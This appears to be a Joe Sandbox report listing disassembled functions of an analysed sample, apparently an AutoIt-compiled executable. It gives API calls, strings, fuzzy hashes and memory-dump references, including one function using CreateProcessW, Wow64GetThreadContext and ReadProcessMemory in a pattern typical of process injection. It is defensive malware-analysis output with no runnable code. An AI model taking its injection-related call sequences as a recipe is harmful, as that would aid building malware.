Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: ba19cfe8a3b5dd81aa130fa1e94bb663913ca7bde5bf2315cc19b6e60fbf2d5c
Instruction ID: 19a0af8b35c41d6a20e58811dfc103876ac5bacef6529e2e0b7760352244d8ab
Opcode Fuzzy Hash: ba19cfe8a3b5dd81aa130fa1e94bb663913ca7bde5bf2315cc19b6e60fbf2d5c
Instruction Fuzzy Hash: 0631D371008318EBE765EB60DC8AFDB77E8BF44300F10451EF595920A1EB789A68C796

Function 0076564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 007656AB
_memcpy_s.LIBCMT ref: 0076571D
__read_nolock.LIBCMT ref: 0076577B
__filbuf.LIBCMT ref: 0076579E
_memset.LIBCMT ref: 007657E2

Part of subcall function 00768D68: __getptd_noexit.LIBCMT ref: 00768D68

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: 990e5cb23cc458da7f234c12e1fcf39f3530ccd544f42378450b102ddee986b8
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: 29518030A00B05DFDB249FB9C88466EB7A5AF40720F648729FC2B962D1D7789D50EB50

Function 007469CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00744F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00744F6F

_free.LIBCMT ref: 0077E68C
_free.LIBCMT ref: 0077E6D3

Part of subcall function 00746BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00746D0D

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0077E462
Bad directive syntax error, xrefs: 0077E6BB

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 4229e3a677c0f5b725ab916d1ca98647823da117f06a5d018abb16882413cf3e
Instruction ID: e1885c9e80b2339abfd3ad20d568d003f6b45e60f87440f397c6f6fbca870d76
Opcode Fuzzy Hash: 4229e3a677c0f5b725ab916d1ca98647823da117f06a5d018abb16882413cf3e
Instruction Fuzzy Hash: BF918E71A10219EFCF04EFA4CC859EDB7B4FF19354B148469F815EB291EB38A915CB60

Function 0074F8CF Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 007603A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007603D3
Part of subcall function 007603A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 007603DB
Part of subcall function 007603A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007603E6
Part of subcall function 007603A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007603F1
Part of subcall function 007603A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 007603F9
Part of subcall function 007603A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00760401

Part of subcall function 00756259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0074FA90), ref: 007562B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0074FB2D
OleInitialize.OLE32(00000000), ref: 0074FBAA
CloseHandle.KERNEL32(00000000), ref: 007849F2

Strings

%}, xrefs: 0074F8F6, 0074F908, 0074FACE, 0074FBB1

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: %}
API String ID: 1986988660-578177530
Opcode ID: eb06dd21bde60d0918c08f0b7dbbbe51b39137472ff6fdd37a19b290685b957f
Instruction ID: a1a9b04852513389af2eaaf4a45a7f7692f47019c650ddfd854381b1436ab47c
Opcode Fuzzy Hash: eb06dd21bde60d0918c08f0b7dbbbe51b39137472ff6fdd37a19b290685b957f
Instruction Fuzzy Hash: 0081B9B0A01A40CEC3C8DF69AD896157BE5FB89318710823AD119C73A2FB794439CF98

Function 007435B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007435A1,SwapMouseButtons,00000004,?), ref: 007435D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007435A1,SwapMouseButtons,00000004,?,?,?,?,00742754), ref: 007435F5
RegCloseKey.KERNELBASE(00000000,?,?,007435A1,SwapMouseButtons,00000004,?,?,?,?,00742754), ref: 00743617

Strings

Control Panel\Mouse, xrefs: 007435D2

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 3612f3f2c1b80458e4e649128440b1e8590b957cf4c2449405ffae8baface32e
Instruction ID: cdb4db237cb656fc65c2f0c4a8b94129efd81d3498cbfc016a4878443bb226af
Opcode Fuzzy Hash: 3612f3f2c1b80458e4e649128440b1e8590b957cf4c2449405ffae8baface32e
Instruction Fuzzy Hash: 1A115771610209BFDB209F64DC80EEEBBB9EF04740F128469F809D7210E3759F409BA6

Function 023912A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 02391ACD
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02391AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02391B13

Memory Dump Source

Source File: 00000000.00000002.1695075216.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2390000_b3u71vBG0u.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
Instruction ID: a14ecb0a41ae932b4213d9ffaacc28c080c1d27e080e5e10a866339e5a6ea5c7
Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
Instruction Fuzzy Hash: ED622C30A14259DBEB24CFA4C840BEEB376EF59700F1091A9D10DEB394E7759E81CB59

Function 007A97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00745045: _fseek.LIBCMT ref: 0074505D

Part of subcall function 007A99BE: _wcscmp.LIBCMT ref: 007A9AAE
Part of subcall function 007A99BE: _wcscmp.LIBCMT ref: 007A9AC1

_free.LIBCMT ref: 007A992C
_free.LIBCMT ref: 007A9933
_free.LIBCMT ref: 007A999E

Part of subcall function 00762F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00769C64), ref: 00762FA9
Part of subcall function 00762F95: GetLastError.KERNEL32(00000000,?,00769C64), ref: 00762FBB

_free.LIBCMT ref: 007A99A6

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction ID: d2832847bd0f9b5c655aefe39bd695ae1a4052788d806671e2f88c7454a9ea3e
Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction Fuzzy Hash: 2C5160B1D04218EFDF249F64CC45A9EBBB9EF89300F1005AEB609A7251DB355E90CF59

Function 0076493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007649D0
__flush.LIBCMT ref: 007649F0
__write.LIBCMT ref: 00764A23
__flsbuf.LIBCMT ref: 00764A51

Part of subcall function 00768D68: __getptd_noexit.LIBCMT ref: 00768D68

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: 04816d767bd2fd1efdccf1b264e6430e03ad742fe6472eb842a98e5505d828e5
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: D241D575640705AFDF28DEA9C8849AF7BAAEF80360B24C13DEC57D7640E778AD408B44

Function 00744DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00744E1A

Strings

AU3!P/}, xrefs: 00744E14
EA06, xrefs: 0077DCF5

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/}$EA06
API String ID: 4104443479-3992199863
Opcode ID: 2b54c66a309529ce4654193b3cef441a1d7d76cbade2da0a589c0cc1aa67caeb
Instruction ID: d5a962b655117203fe46ec494a9a564d4e361c11b9243391b41611dc30d44b28
Opcode Fuzzy Hash: 2b54c66a309529ce4654193b3cef441a1d7d76cbade2da0a589c0cc1aa67caeb
Instruction Fuzzy Hash: 0B416A71A041A8ABDF219F648C557BE7FA6AF06300F684065FC829B283C73D9D44A7E1

Function 007473E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0077EE62
GetOpenFileNameW.COMDLG32(?), ref: 0077EEAC

Part of subcall function 007448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007448A1,?,?,007437C0,?), ref: 007448CE

Part of subcall function 007609D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007609F4

Strings

X, xrefs: 0077EE7A

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 54dbb020c78708fee58bd0f65416a8c8fd0d1b9257cd105003cc4f255d0de97f
Instruction ID: 8c8085f7110715e3ddc27e717debd94e73b462e8e34c785efe2d36697c447a00
Opcode Fuzzy Hash: 54dbb020c78708fee58bd0f65416a8c8fd0d1b9257cd105003cc4f255d0de97f
Instruction Fuzzy Hash: 1921A471A10298DBDF059F94C849BEE7BF99F49310F008059E509A7241DBBC5989CF91

Function 007A901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007A9036
__fread_nolock.LIBCMT ref: 007A904B

Strings

EA06, xrefs: 007A907D

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 68544486bd5718f69661a66a2086613020c3ee9c1f5429f9db8ecc74e0118c7e
Instruction ID: d797d1211ac8dce8511713b27cdfacf8152c2db7a8245e15bcb79d0f290a4a9d
Opcode Fuzzy Hash: 68544486bd5718f69661a66a2086613020c3ee9c1f5429f9db8ecc74e0118c7e
Instruction Fuzzy Hash: 8001B971904258BEDB28C7A8CC5AEFE7BF8DB15301F00419AF553D2581E579A6149B60

Function 007A9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 007A9B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007A9B99

Strings

aut, xrefs: 007A9B93

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: ac840a13dfb9e94311514f829cf783f41a89520d47f2c926c738b8a2bb0f0fa2
Instruction ID: 672e881de40a98acd52a02acbdff258cc223f07eea6135ea61b2c557cd85ef7b
Opcode Fuzzy Hash: ac840a13dfb9e94311514f829cf783f41a89520d47f2c926c738b8a2bb0f0fa2
Instruction Fuzzy Hash: ACD05B7554030D7BDB109B94DC0DFAA772CE704700F0041A1FF5491191DDB455948B95

Function 007BCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a43e27b96558c488ce5e9ef2e395dc78489d4973b1df0410a3bc733fe01e3b2
Instruction ID: a0504c4b44a2a96bbf5fea72cc25f74644a9976181138197e536c49d85e6984f
Opcode Fuzzy Hash: 8a43e27b96558c488ce5e9ef2e395dc78489d4973b1df0410a3bc733fe01e3b2
Instruction Fuzzy Hash: 89F11671608345DFC724DF28C484AAABBE5BF88314F14892DF8999B251E739ED45CF82

Function 007443DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00744401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 007444A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 007444C3

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: de49a857754748b19fac44bb67b5df1a6d5cbca01a6bd14f46f8cc8bbb7e9024
Instruction ID: 55443a2f8daa26bb8e8d83e06cbf26dd515e28d84d62abc6d6fd58bd50df7cb5
Opcode Fuzzy Hash: de49a857754748b19fac44bb67b5df1a6d5cbca01a6bd14f46f8cc8bbb7e9024
Instruction Fuzzy Hash: DD318FB0505741CFD760DF68D884B9BBBF8FB49308F00092EF59A83240E779A958DB92

Function 0076594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00765963

Part of subcall function 0076A3AB: __NMSG_WRITE.LIBCMT ref: 0076A3D2
Part of subcall function 0076A3AB: __NMSG_WRITE.LIBCMT ref: 0076A3DC

__NMSG_WRITE.LIBCMT ref: 0076596A

Part of subcall function 0076A408: GetModuleFileNameW.KERNEL32(00000000,008043BA,00000104,?,00000001,00000000), ref: 0076A49A
Part of subcall function 0076A408: ___crtMessageBoxW.LIBCMT ref: 0076A548

Part of subcall function 007632DF: ___crtCorExitProcess.LIBCMT ref: 007632E5
Part of subcall function 007632DF: ExitProcess.KERNEL32 ref: 007632EE

Part of subcall function 00768D68: __getptd_noexit.LIBCMT ref: 00768D68

RtlAllocateHeap.NTDLL(01670000,00000000,00000001,00000000,?,?,?,00761013,?), ref: 0076598F

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 3d6c7cba9619fcb828c5b6dec82ae4ff35a98b98bed92d9f91e1b39c7396b752
Instruction ID: 67f96297581dbe972cf4081630c5281ff94820d3c75f8108b8eb3fbfdf69e795
Opcode Fuzzy Hash: 3d6c7cba9619fcb828c5b6dec82ae4ff35a98b98bed92d9f91e1b39c7396b752
Instruction Fuzzy Hash: 7701D271340B15EEE6113B34DC46A2E72989F42730F10012AFD03AB182DF7CAD41AA61

Function 007A9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007A97D2,?,?,?,?,?,00000004), ref: 007A9B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007A97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007A9B5B
CloseHandle.KERNEL32(00000000,?,007A97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007A9B62

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 1344cc9387740694b13f4144ecaaaabfc6d30ed7f2a65c77d076a2f994349ed5
Instruction ID: fdb716e05950df86d17423a5a63d1ed8e5708a19770c4581de3a9713b1ec5732
Opcode Fuzzy Hash: 1344cc9387740694b13f4144ecaaaabfc6d30ed7f2a65c77d076a2f994349ed5
Instruction Fuzzy Hash: 2AE08632180218B7D7211B54EC09FCA7F19AB45761F148225FB14690E087B56521979C

